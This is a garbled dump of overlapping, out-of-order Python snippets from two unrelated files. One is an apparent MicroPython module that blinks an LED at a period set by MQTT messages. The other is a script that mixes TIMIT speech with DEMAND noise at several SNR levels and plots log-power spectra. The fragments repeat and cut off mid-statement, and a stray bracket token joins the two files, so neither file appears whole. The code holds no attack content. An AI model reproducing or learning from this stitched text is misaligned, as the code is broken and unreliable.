mqtt.on_msg(self.on_msg) await", "config.get(\"period\", 1000) # get period from config with a default of 1000ms log.info(\"start", "board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period from config", "or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period = p", "sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period =", "= millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\")", "except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up", "async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\",", "sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg,", "p < 50 or p > 10000: raise ValueError(\"period must be in 50..10000\")", "log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is", "incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed", "topic, period): self.mqclient = mqclient self.topic = topic self.period = period async def", "topic == self.topic: try: p = int(msg) if p < 50 or p", "class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic", "must be in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid", "called by the module launcher loop in main.py; it is passed a handle", "period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic", "mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period = period async", "launcher loop in main.py; it is passed a handle onto the MQTT #", "passed a handle onto the MQTT # dispatcher and to the \"blinky\" config", "50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\") async", "= p except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self,", "period async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await", "True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self,", "qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by the module launcher", "in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period from", "a handle onto the MQTT # dispatcher and to the \"blinky\" config dict", "Loop as loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient,", "self.topic) # start is called by the module launcher loop in main.py; it", "<filename>blinky/blinky.py<gh_stars>10-100 import logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms", "loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic, period):", "2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def", "qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic,", "start is called by the module launcher loop in main.py; it is passed", "= mqclient self.topic = topic self.period = period async def blinker(self): while True:", "__init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period = period", "act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self,", "from config with a default of 1000ms log.info(\"start called, period=%d\", period) bl =", "by the module launcher loop in main.py; it is passed a handle onto", "called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called", "topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d", "self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\") async def", "dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg),", "= config.get(\"period\", 1000) # get period from config with a default of 1000ms", "10000: raise ValueError(\"period must be in 50..10000\") self.period = p except Exception as", "\"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if", "logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import act_led class", "config with a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client,", "mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by", "dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try: p =", "retained, qos, dup) if topic == self.topic: try: p = int(msg) if p", "qos, dup) if topic == self.topic: try: p = int(msg) if p <", "to the \"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\",", "period = config.get(\"period\", 1000) # get period from config with a default of", "def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period =", "mqclient self.topic = topic self.period = period async def blinker(self): while True: act_led(1)", "ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try:", "self.topic = topic self.period = period async def blinker(self): while True: act_led(1) await", "period): self.mqclient = mqclient self.topic = topic self.period = period async def blinker(self):", "async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period", "of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period) loop.create_task(bl.blinker()) mqtt.on_init(bl.hook_it_up(mqtt))", "config): period = config.get(\"period\", 1000) # get period from config with a default", "Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period", "Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\")", "log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic,", "loop in main.py; it is passed a handle onto the MQTT # dispatcher", "board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient", "from board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient =", "msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d", "log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic", "sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient", "self.topic: try: p = int(msg) if p < 50 or p > 10000:", "import logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from", "log.info(\"Subscribed to %s\", self.topic) # start is called by the module launcher loop", "from uasyncio import Loop as loop, sleep_ms from board import act_led class Blinker:", "raise ValueError(\"period must be in 50..10000\") self.period = p except Exception as e:", "dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt, config): period", "self.period = period async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2)", "p > 10000: raise ValueError(\"period must be in 50..10000\") self.period = p except", "await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic,", "= int(msg) if p < 50 or p > 10000: raise ValueError(\"period must", "%s\", self.topic) # start is called by the module launcher loop in main.py;", "and to the \"blinky\" config dict in board_config.py def start(mqtt, config): period =", "50 or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period =", "mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by the module", "p = int(msg) if p < 50 or p > 10000: raise ValueError(\"period", "dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period", "the \"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000)", "< 50 or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period", "it is passed a handle onto the MQTT # dispatcher and to the", "== self.topic: try: p = int(msg) if p < 50 or p >", "config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get", "default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period) loop.create_task(bl.blinker())", "with a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"],", "1000) # get period from config with a default of 1000ms log.info(\"start called,", "retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\",", "message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to", "await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by the", "= logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import act_led", "= period async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0)", "\"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1)", "blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2)", "period from config with a default of 1000ms log.info(\"start called, period=%d\", period) bl", "the MQTT # dispatcher and to the \"blinky\" config dict in board_config.py def", "as loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic,", "len(msg), retained, qos, dup) if topic == self.topic: try: p = int(msg) if", "as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg)" ]
[ "160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect =", "norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1", "plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "x2.shape[0] if l1 != l2: if handle_method == 'cut': ll = min(l1, l2)", "= x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix", "x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut': ll", "min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll", "* norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 + x2", "np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1)", "x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32), fs, blocking=True)", "= x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut':", "noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure()", "x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr))", "160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect", "read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True)", "= log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5,", "x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if", "feature_extractor import * from matplotlib import pyplot as plt def SNR(x1, x2): from", "+ x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs,", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5,", "numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) / (10.0 **", "from feature_extractor import * from matplotlib import pyplot as plt def SNR(x1, x2):", "<reponame>ZhihaoDU/speech_feature_extractor # coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav", "'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return 20", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data,", "320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect", "= mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313)", "if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2", "plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) / (10.0", "if handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll] x2 =", "plt def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) /", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "l1 != l2: if handle_method == 'cut': ll = min(l1, l2) x1 =", "noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "import wavfile from feature_extractor import * from matplotlib import pyplot as plt def", "utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile", "speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320,", "wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160,", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "elif handle_method == 'append': ll = max(l1, l2) if l1 < ll: x1", "import norm x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05", "norm x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 *", "x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 !=", "/ norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32)", "= max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2", "== '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect =", "def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 =", "return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 =", "noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll]", "mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav')", "noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show()", "= wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech", "if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure()", "l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 =", "np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import", "/ (10.0 ** (0.05 * snr)) mix = x1 + x2 return mix", "160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect =", "5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech =", "plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 /", "* np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2", "320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut')", "l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 =", "x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from", "'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "from scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot as", "pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return 20 *", "numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor", "norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1", "x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2)", "-5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech =", "noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech", "= x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if", "# coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from", "x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut')", "'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io", "as plt def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1)", "ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method ==", "= np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg", "/ norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix = x1", "= mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211)", "< ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2", "= x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header =", "mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect)", "= read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning',", "np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 =", "scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot as plt", "noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech", "'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method", "plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "-10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32),", "True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "ll = max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if", "ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1])", "== 'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif", "= np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) *", "** (0.05 * snr)) mix = x1 + x2 return mix if __name__", "def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2))", "!= l2: if handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll]", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 +", "noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect)", "l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll:", "import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method):", "= utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import", "l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll =", "True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut')", "from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from", "snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 =", "x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\")", "wavfile from feature_extractor import * from matplotlib import pyplot as plt def SNR(x1,", "* from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import", "320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect", "mix = x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header", "'append': ll = max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1])", "mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect)", "read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib", "__name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect", "True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect)", "x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1 < ll:", "wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech =", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from", "SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def", "x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) /", "(10.0 ** (0.05 * snr)) mix = x1 + x2 return mix if", "== 'append': ll = max(l1, l2) if l1 < ll: x1 = np.append(x1,", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32), fs,", "if l1 != l2: if handle_method == 'cut': ll = min(l1, l2) x1", "x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1,", "snr)) mix = x1 + x2 return mix if __name__ == '__main__': speech_data,", "read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot", "import * from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg", "plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method", "numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr,", "0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech", "160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect =", "mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect)", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data,", "x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data", "'__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data,", "True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "x2 = x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1", "np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import *", "x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = max(l1,", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, 